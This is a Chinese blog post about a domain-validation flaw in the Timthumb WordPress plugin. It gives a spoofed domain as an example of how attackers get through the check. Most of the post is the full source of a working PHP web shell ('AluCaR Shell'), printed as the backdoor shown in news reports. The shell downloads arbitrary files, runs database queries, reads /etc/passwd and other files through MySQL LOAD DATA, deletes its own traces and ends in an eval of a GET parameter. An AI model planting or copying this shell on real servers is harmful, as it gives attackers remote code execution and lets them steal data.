WordPress第三方插件Timthumb漏洞被曝光

今天看到各大网站都报道了WordPress第三方插件Timthumb漏洞被曝光,Timthumb是一款第三方图像处理脚本,它可以实现动态图像裁剪、缩放和调整。

脚本的文件名是timthumb.php,该文档定义了数个可以远程提取的相册,但脚本并没有很好地验证这些域名,因此类似http://flickr.com.maliciousdomain.com这样的欺骗性二三级域名也会被通过,所以黑客理论上可以用任何域名后缀轻松仿冒,并通过缓存目录上传各种恶意程序。

报道的内容有点夸张,毕竟是一款第三方插件Timthumb漏洞,没装Timthumb的完全可以不用理会。另外报道中那张貌似很牛X的图片就是一个PHP后门程序。程序代码如下

<?php
  $language='eng';
  $auth = 0;
  $name='ecd708a016f8407bd27cc0a02677351b'; //// AluCaR
  $pass='1b8644e229c999e4f6ba799483b196ce'; //// HcEgRoUp.NeT
  /******************************************************************************************************/
  
  error_reporting(E_ALL);
  set_magic_quotes_runtime(0);
  @set_time_limit(0);
  @ini_set('max_execution_time',0);
  @ini_set('output_buffering',0);
  $safe_mode = @ini_get('safe_mode');
  $version = 'VietTeam Edition';
  if(version_compare(phpversion(), '4.1.0') == -1)
  {
    $_POST   = &$HTTP_POST_VARS;
    $_GET    = &$HTTP_GET_VARS;
    $_SERVER = &$HTTP_SERVER_VARS;
    $_COOKIE = &$HTTP_COOKIE_VARS;
  }
  if (@get_magic_quotes_gpc())
  {
    foreach ($_POST as $k=>$v)
    {
      $_POST[$k] = stripslashes($v);
    }
    foreach ($_COOKIE as $k=>$v)
    {
      $_COOKIE[$k] = stripslashes($v);
    }
  }
  
  if($auth == 1) {
    if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!= $name || md5($_SERVER['PHP_AUTH_PW'])!= $pass)
    {
      header('WWW-Authenticate: Basic realm="hCe-GrOuP + AluCaR"');
      header('HTTP/1.0 401 Unauthorized');
      exit("<b>Contact <a href=http://hcegroup.vn/ </a> : Access Denied</b>");
    }
  }
  $head = '<!-- Edited by Alucar -->
  <html>
  <head>
  </script>
  <title>AluCaR Shell</title>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  
  <STYLE>
  tr {
  BORDER-RIGHT:  #Black 1px solid;
  BORDER-TOP:    Black 1px solid;
  BORDER-LEFT:   Black 1px solid;
  BORDER-BOTTOM: #Black 1px solid;
  BORDER-COLOR: #83c809;
  color: White;
  }
  td {
  BORDER-RIGHT:  #Black 1px solid;
  BORDER-TOP:    Black 1px solid;
  BORDER-LEFT:   Black 1px solid;
  BORDER-BOTTOM: #Black 1px solid;
  BORDER-COLOR: #83c809;
  color: White;
  }
  .table1 {
  BORDER: 0px;
  BORDER-COLOR: #83c809;
  BACKGROUND-COLOR: Black;
  color: White;
  }
  .td1 {
  BORDER: 0px;
  BORDER-COLOR: #83c809;
  font: 7pt Verdana;
  color: White;
  }
  .tr1 {
  BORDER: 0px;
  BORDER-COLOR: #83c809;
  color: White;
  }
  table {
  BORDER:  Black 1px outset;
  BORDER-COLOR: #83c809;
  BACKGROUND-COLOR: Black;
  color: White;
  }
  input {
  border			: solid 1px;
  border-color		: White White White White;
  BACKGROUND-COLOR: Black;
  font: 8pt Verdana;
  color: White;
  }
  select {
  BORDER-RIGHT:  Black 1px solid;
  BORDER-TOP:    White 1px solid;
  BORDER-LEFT:   White 1px solid;
  BORDER-BOTTOM: Black 1px solid;
  BORDER-COLOR: White;
  BACKGROUND-COLOR: Black;
  font: 8pt Verdana;
  color: Red;
  }
  submit {
  BORDER:  buttonhighlight 2px outset;
  BACKGROUND-COLOR: Black;
  width: 30%;
  color: White;
  }
  textarea {
  BORDER-RIGHT:  Black 1px solid;
  BORDER-TOP:    White 1px solid;
  BORDER-LEFT:   White 1px solid;
  BORDER-BOTTOM: Black 1px solid;
  BORDER-COLOR: #83c809;
  BACKGROUND-COLOR: Black;
  font: Fixedsys bold;
  color: White;
  }
  BODY {
	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-COLOR: White; SCROLLBAR-SHADOW-COLOR: White; SCROLLBAR-3DLIGHT-COLOR: White; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-COLOR: White; SCROLLBAR-DARKSHADOW-COLOR: White
  margin: 1px;
  color: Red;
  background-color: Black;
  }
  .main {
  margin			: -287px 0px 0px -490px;
  border			: White solid 1px;
  BORDER-COLOR: #83c809;
  }
  .tt {
  background-color: Black;
  }
  
  A:link {
	COLOR: #347202; TEXT-DECORATION: none
  }
  A:visited {
	COLOR: #347202; TEXT-DECORATION: none
  }
  A:hover {
	COLOR: White; TEXT-DECORATION: none
  }
  A:active {
	COLOR: White; TEXT-DECORATION: none
  }
  </STYLE>
  <script language=\'javascript\'>
  function hide_div(id)
  {
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
  }
  function show_div(id)
  {
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
  }
  function change_divst(id)
  {
  if (document.getElementById(id).style.display == \'none\')
  show_div(id);
  else
  hide_div(id);
  }
  </script>';
  class zipfile
  {
    var $datasec      = array();
    var $ctrl_dir     = array();
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    var $old_offset   = 0;
    function unix2DosTime($unixtime = 0) {
      $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
      if ($timearray['year'] < 1980) {
        $timearray['year']    = 1980;
        $timearray['mon']     = 1;
        $timearray['mday']    = 1;
        $timearray['hours']   = 0;
        $timearray['minutes'] = 0;
        $timearray['seconds'] = 0;
      }
      return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
      ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }
    function addFile($data, $name, $time = 0)
    {
      $name     = str_replace('\\', '/', $name);
      $dtime    = dechex($this->unix2DosTime($time));
      $hexdtime = '\x' . $dtime[6] . $dtime[7]
      . '\x' . $dtime[4] . $dtime[5]
      . '\x' . $dtime[2] . $dtime[3]
      . '\x' . $dtime[0] . $dtime[1];
      eval('$hexdtime = "' . $hexdtime . '";');
      $fr   = "\x50\x4b\x03\x04";
      $fr   .= "\x14\x00";
      $fr   .= "\x00\x00";
      $fr   .= "\x08\x00";
      $fr   .= $hexdtime;
      $unc_len = strlen($data);
      $crc     = crc32($data);
      $zdata   = gzcompress($data);
      $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
      $c_len   = strlen($zdata);
      $fr      .= pack('V', $crc);
      $fr      .= pack('V', $c_len);
      $fr      .= pack('V', $unc_len);
      $fr      .= pack('v', strlen($name));
      $fr      .= pack('v', 0);
      $fr      .= $name;
      $fr .= $zdata;
      $this -> datasec[] = $fr;
      $cdrec = "\x50\x4b\x01\x02";
      $cdrec .= "\x00\x00";
      $cdrec .= "\x14\x00";
      $cdrec .= "\x00\x00";
      $cdrec .= "\x08\x00";
      $cdrec .= $hexdtime;
      $cdrec .= pack('V', $crc);
      $cdrec .= pack('V', $c_len);
      $cdrec .= pack('V', $unc_len);
      $cdrec .= pack('v', strlen($name) );
      $cdrec .= pack('v', 0 );
      $cdrec .= pack('v', 0 );
      $cdrec .= pack('v', 0 );
      $cdrec .= pack('v', 0 );
      $cdrec .= pack('V', 32 );
      $cdrec .= pack('V', $this -> old_offset );
      $this -> old_offset += strlen($fr);
      $cdrec .= $name;
      $this -> ctrl_dir[] = $cdrec;
    }
    function file()
    {
      $data    = implode('', $this -> datasec);
      $ctrldir = implode('', $this -> ctrl_dir);
      return
      $data .
      $ctrldir .
      $this -> eof_ctrl_dir .
      pack('v', sizeof($this -> ctrl_dir)) .
      pack('v', sizeof($this -> ctrl_dir)) .
      pack('V', strlen($ctrldir)) .
      pack('V', strlen($data)) .
      "\x00\x00";
    }
  }
  function compress(&$filename,&$filedump,$compress)
  {
    global $content_encoding;
    global $mime_type;
    if ($compress == 'bzip' && @function_exists('bzcompress'))
    {
      $filename  .= '.bz2';
      $mime_type = 'application/x-bzip2';
      $filedump = bzcompress($filedump);
    }
    else if ($compress == 'gzip' && @function_exists('gzencode'))
    {
      $filename  .= '.gz';
      $content_encoding = 'x-gzip';
      $mime_type = 'application/x-gzip';
      $filedump = gzencode($filedump);
    }
    else if ($compress == 'zip' && @function_exists('gzcompress'))
    {
     	$filename .= '.zip';
      $mime_type = 'application/zip';
      $zipfile = new zipfile();
      $zipfile -> addFile($filedump, substr($filename, 0, -4));
      $filedump = $zipfile -> file();
    }
    else
    {
     	$mime_type = 'application/octet-stream';
    }
  }
  function mailattach($to,$from,$subj,$attach)
  {
    $headers  = "From: $from\r\n";
    $headers .= "MIME-Version: 1.0\r\n";
    $headers .= "Content-Type: ".$attach['type'];
    $headers .= "; name=\"".$attach['name']."\"\r\n";
    $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
    $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
    if(@mail($to,$subj,"",$headers)) { return 1; }
    return 0;
  }
  class my_sql
  {
    var $host = 'localhost';
    var $port = '';
    var $user = '';
    var $pass = '';
    var $base = '';
    var $db   = '';
    var $connection;
    var $res;
    var $error;
    var $rows;
    var $columns;
    var $num_rows;
    var $num_fields;
    var $dump;
    
    function connect()
    {
      switch($this->db)
      {
        case 'MySQL':
          if(empty($this->port)) { $this->port = '3306'; }
          if(!function_exists('mysql_connect')) return 0;
          $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
          if(is_resource($this->connection)) return 1;
          break;
        case 'MSSQL':
          if(empty($this->port)) { $this->port = '1433'; }
          if(!function_exists('mssql_connect')) return 0;
          $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
          if($this->connection) return 1;
          break;
        case 'PostgreSQL':
          if(empty($this->port)) { $this->port = '5432'; }
          $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
          if(!function_exists('pg_connect')) return 0;
          $this->connection = @pg_connect($str);
          if(is_resource($this->connection)) return 1;
          break;
        case 'Oracle':
          if(!function_exists('ocilogon')) return 0;
          $this->connection = @ocilogon($this->user, $this->pass, $this->base);
          if(is_resource($this->connection)) return 1;
          break;
      }
      return 0;
    }
    
    function select_db()
    {
      switch($this->db)
      {
        case 'MySQL':
          if(@mysql_select_db($this->base,$this->connection)) return 1;
          break;
        case 'MSSQL':
          if(@mssql_select_db($this->base,$this->connection)) return 1;
          break;
        case 'PostgreSQL':
          return 1;
          break;
        case 'Oracle':
          return 1;
          break;
      }
      return 0;
    }
    
    function query($query)
    {
      $this->res=$this->error='';
      switch($this->db)
      {
        case 'MySQL':
          if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
          {
            $this->error = @mysql_error($this->connection);
            return 0;
          }
          else if(is_resource($this->res)) { return 1; }
          return 2;
          break;
        case 'MSSQL':
          if(false===($this->res=@mssql_query($query,$this->connection)))
          {
            $this->error = 'Query error';
            return 0;
          }
          else if(@mssql_num_rows($this->res) > 0) { return 1; }
          return 2;
          break;
        case 'PostgreSQL':
          if(false===($this->res=@pg_query($this->connection,$query)))
          {
            $this->error = @pg_last_error($this->connection);
            return 0;
          }
          else if(@pg_num_rows($this->res) > 0) { return 1; }
          return 2;
          break;
        case 'Oracle':
          if(false===($this->res=@ociparse($this->connection,$query)))
          {
            $this->error = 'Query parse error';
          }
          else
          {
            if(@ociexecute($this->res))
            {
              if(@ocirowcount($this->res) != 0) return 2;
              return 1;
            }
            $error = @ocierror();
            $this->error=$error['message'];
          }
          break;
      }
      return 0;
    }
    function get_result()
    {
      $this->rows=array();
      $this->columns=array();
      $this->num_rows=$this->num_fields=0;
      switch($this->db)
      {
        case 'MySQL':
          $this->num_rows=@mysql_num_rows($this->res);
          $this->num_fields=@mysql_num_fields($this->res);
          while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
          @mysql_free_result($this->res);
          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
          break;
        case 'MSSQL':
          $this->num_rows=@mssql_num_rows($this->res);
          $this->num_fields=@mssql_num_fields($this->res);
          while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
          @mssql_free_result($this->res);
          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
          break;
        case 'PostgreSQL':
          $this->num_rows=@pg_num_rows($this->res);
          $this->num_fields=@pg_num_fields($this->res);
          while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
          @pg_free_result($this->res);
          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
          break;
        case 'Oracle':
          $this->num_fields=@ocinumcols($this->res);
          while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
          @ocifreestatement($this->res);
          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
          break;
      }
      return 0;
    }
    function dump($table)
    {
      if(empty($table)) return 0;
      $this->dump=array();
      $this->dump[0] = '##';
      $this->dump[1] = '## --------------------------------------- ';
      $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
      $this->dump[3] = '## Database: '.$this->base;
      $this->dump[4] = '##    Table: '.$table;
      $this->dump[5] = '## --------------------------------------- ';
      switch($this->db)
      {
        case 'MySQL':
          $this->dump[0] = '## MySQL dump';
          if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
          if(!$this->get_result()) return 0;
          $this->dump[] = $this->rows[0]['Create Table'];
          $this->dump[] = '## --------------------------------------- ';
          if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
          if(!$this->get_result()) return 0;
          for($i=0;$i<$this->num_rows;$i++)
          {
            foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
            $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
          }
          break;
        case 'MSSQL':
          $this->dump[0] = '## MSSQL dump';
          if($this->query('SELECT * FROM '.$table)!=1) return 0;
          if(!$this->get_result()) return 0;
          for($i=0;$i<$this->num_rows;$i++)
          {
            foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
          }
          break;
        case 'PostgreSQL':
          $this->dump[0] = '## PostgreSQL dump';
          if($this->query('SELECT * FROM '.$table)!=1) return 0;
          if(!$this->get_result()) return 0;
          for($i=0;$i<$this->num_rows;$i++)
          {
            foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
          }
          break;
        case 'Oracle':
          $this->dump[0] = '## ORACLE dump';
          $this->dump[]  = '## under construction';
          break;
        default:
          return 0;
          break;
      }
      return 1;
    }
    function close()
    {
      switch($this->db)
      {
        case 'MySQL':
          @mysql_close($this->connection);
          break;
        case 'MSSQL':
          @mssql_close($this->connection);
          break;
        case 'PostgreSQL':
          @pg_close($this->connection);
          break;
        case 'Oracle':
          @oci_close($this->connection);
          break;
      }
    }
    function affected_rows()
    {
      switch($this->db)
      {
        case 'MySQL':
          return @mysql_affected_rows($this->res);
          break;
        case 'MSSQL':
          return @mssql_affected_rows($this->res);
          break;
        case 'PostgreSQL':
          return @pg_affected_rows($this->res);
          break;
        case 'Oracle':
          return @ocirowcount($this->res);
          break;
        default:
          return 0;
          break;
      }
    }
  }
  if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
  {
    if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
    else
    {
      @ob_clean();
      $filename = @basename($_POST['d_name']);
      $filedump = @fread($file,@filesize($_POST['d_name']));
      fclose($file);
      $content_encoding=$mime_type='';
      compress($filename,$filedump,$_POST['compress']);
      if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
      header("Content-type: ".$mime_type);
      header("Content-disposition: attachment; filename=\"".$filename."\";");
      echo $filedump;
      exit();
    }
  }
  if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
  {
    echo $head;
    $sql = new my_sql();
    $sql->db   = $_POST['db'];
    $sql->host = $_POST['db_server'];
    $sql->port = $_POST['db_port'];
    $sql->user = $_POST['mysql_l'];
    $sql->pass = $_POST['mysql_p'];
    $sql->base = $_POST['mysql_db'];
    $querys = @explode(';',$_POST['db_query']);
    echo '<body bgcolor=Black>';
    if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=White><b>Can't connect to SQL server</b></font></div>";
    else
    {
      if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=White><b>Can't select database</b></font></div>";
      else
      {
        foreach($querys as $num=>$query)
        {
          if(strlen($query)>5)
          {
            echo "<font face=Verdana size=-2 color=White><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
            switch($sql->query($query))
            {
              case '0':
                echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
                break;
              case '1':
                if($sql->get_result())
                {
                  echo "<table width=100% border=0 cellpadding=0 cellspacing=0>";
                  foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
                  $keys = @implode(" </b></font></td><td class=main><font face=Verdana size=-2><b> ", $sql->columns);
                  echo "<tr><td class=main bgcolor=White><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
                  for($i=0;$i<$sql->num_rows;$i++)
                  {
                    foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
                    $values = @implode(" </font></td><td class=main><font face=Verdana size=-2> ",$sql->rows[$i]);
                    echo '<tr><td class=main><font face=Verdana size=-2> '.$values.' </font></td></tr>';
                  }
                  echo "</table>";
                }
                break;
              case '2':
                $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
                echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
                break;
            }
          }
        }
      }
      echo "<br><div align=left id='n'><table width=100% height=60 border=0 cellpadding=0 cellspacing=0>";
      echo "<tr><td align=center><b>Show Database</b></td><td align=center><b>Show Tables</b></td></tr>";
      echo "<tr><td><textarea cols=50 rows=6 name=query_db>";
      $query_db = mysql_query("SHOW DATABASES;");
      while ($query_db_row = mysql_fetch_array($query_db))
      {
        echo $query_db_row[0]."\n";
      }
      echo "</textarea></td><td><div align=right><textarea cols=60 rows=6 name=query_tables>";
      if (($_POST['mysql_db']) && $sql->select_db())
      {
        $query_tables = mysql_query("SHOW TABLES;");
        while ($query_tables_row = mysql_fetch_array($query_tables))
        {
          echo $query_tables_row[0]."\n";
        }
      }
      echo "</textarea></div></td></tr></table></div>";
    }
    echo "<br><form name=form method=POST>";
    echo in('hidden','db',0,$_POST['db']);
    echo in('hidden','db_server',0,$_POST['db_server']);
    echo in('hidden','db_port',0,$_POST['db_port']);
    echo in('hidden','mysql_l',0,$_POST['mysql_l']);
    echo in('hidden','mysql_p',0,$_POST['mysql_p']);
    echo in('hidden','mysql_db',0,$_POST['mysql_db']);
    echo in('hidden','cmd',0,'db_query');
    echo "<div align=center>";
    echo "<font face=Verdana size=-2><b>Use database: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
    echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
    echo "<div align=center><font face=Verdana size=-2><b>Load file: </b><input type=text name=loadfile size=100 value=".(!empty($_POST['loadfile'])?($_POST['loadfile']):("/etc/passwd")).">".ws(2)."<input type=submit name=submit value=\" Load \">

";
    echo "<b>File content</b><br><br>";
    echo "<textarea cols=121 rows=15 name=showloadfile>";
    @mysql_query("DROP TABLE IF EXISTS Alucar");
    @mysql_query("CREATE TABLE `Alucar` ( `file` LONGBLOB NOT NULL )");
    @mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['loadfile'])."\" INTO TABLE Alucar FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
    $r = @mysql_query("SELECT * FROM Alucar");
    while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
    @mysql_query("DROP TABLE IF EXISTS Alucar");
    echo "</textarea></div>";
    echo "</form>";
    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
  }
  if(isset($_GET['delete']))
  {
    @unlink(__FILE__);
  }
  if(isset($_GET['tmp']))
  {
    @unlink("/tmp/bdpl");
    @unlink("/tmp/back");
    @unlink("/tmp/bd");
    @unlink("/tmp/bd.c");
    @unlink("/tmp/dp");
    @unlink("/tmp/dpc");
    @unlink("/tmp/dpc.c");
  }
  if(isset($_GET['phpini']))
  {
    echo $head;
    function U_value($value)
    {
      if ($value == '') return '<i>no value</i>';
      if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
      if ($value === null) return 'NULL';
      if (@is_object($value)) $value = (array) $value;
      if (@is_array($value))
      {
        @ob_start();
        print_r($value);
        $value = @ob_get_contents();
        @ob_end_clean();
      }
      return U_wordwrap((string) $value);
    }
    function U_wordwrap($str)
    {
      $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
      return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
    }
    if (@function_exists('ini_get_all'))
    {
      $r = '';
      echo '<table width=100%>', '<tr><td class=main bgcolor=#83c809><font face=Verdana size=-2 color=White><div align=center><b>Directive</b></div></font></td><td class=main bgcolor=#83c809><font face=Verdana size=-2 color=White><div align=center><b>Local Value</b></div></font></td><td class=main bgcolor=#83c809><font face=Verdana size=-2 color=White><div align=center><b>Master Value</b></div></font></td></tr>';
      foreach (@ini_get_all() as $key=>$value)
      {
        $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
      }
      echo $r;
      echo '</table>';
    }
    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
    die();
  }
  if(isset($_GET['cpu']))
  {
    echo $head;
    echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=White><b>CPU</b></font></div></td></tr></table><table width=100%>';
    $cpuf = @file("cpuinfo");
    if($cpuf)
    {
      $c = @sizeof($cpuf);
      for($i=0;$i<$c;$i++)
      {
        $info = @explode(":",$cpuf[$i]);
        if($info[1]==""){ $info[1]="---"; }
        $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
      }
      echo $r;
    }
    else
    {
      echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
    }
    echo '</table>';
    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b>";
  ?>
<?php
  eval(stripslashes($_GET['eval'])); 
  ?>

《WordPress第三方插件Timthumb漏洞被曝光》有7个想法

发表评论

电子邮件地址不会被公开。 必填项已用*标注